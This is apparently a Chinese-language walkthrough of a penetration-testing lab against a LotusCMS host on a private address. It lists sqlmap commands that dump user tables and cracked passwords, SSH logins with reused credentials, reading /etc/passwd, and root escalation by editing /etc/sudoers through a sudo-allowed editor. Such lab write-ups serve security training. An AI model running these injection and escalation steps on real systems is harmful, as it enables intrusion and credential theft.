一,主机发现
二,信息收集
1.访问首页
将域名与ip做绑定
访问,发现有id参数
2.目录扫描
1)/modules
2)/phpmyadmin
3)发现cms
4)首页的登陆页面
三,利用
1.到kali找历史漏洞
searchsploit lotusCMS
直接sql注入
sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch
查询数据库信息
sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch --dbs # 查询数据库名
sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch -D gallery --tables # 查询gallery库下数据表
sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users --dump 查询 user 表下用户
sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --dump
# admin:n0t7t1k4
# dreg:0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)
# loneferret:5badcaf789d3d1d09794d8f021f40f0e (starwars)
使用得到的密码尝试登录博客,登录失败
getshell
尝试另两组用户名密码,发现可通过 ssh 远程连接
ssh dreg@192.168.119.140
提示需要凭证
ssh -oHostKeyAlgorithms=+ssh-dss dreg@192.168.119.140
ssh -oHostKeyAlgorithms=+ssh-dss loneferret@192.168.119.140
四,提权
发现 loneferret 用户存在利用点
cat /etc/passwd
查看用户家目录
ls
cat CompanyPolicy.README
根据提示,执行命令
ssh -oHostKeyAlgorithms=+ssh-dss loneferret@192.168.119.140
find / -perm -u=s -type f 2>/dev/null
sudo -l
sudo /usr/local/bin/ht
//报错Error opening terminal: xterm-256color.则 export TERM=xterm
//ht编辑器修改/etc/sudoers:F3 --> 查找 /etc/sudoers --> 添加 /bin/bash --> F2 保存 --> F10 退出
sudo /bin/bash
提权成功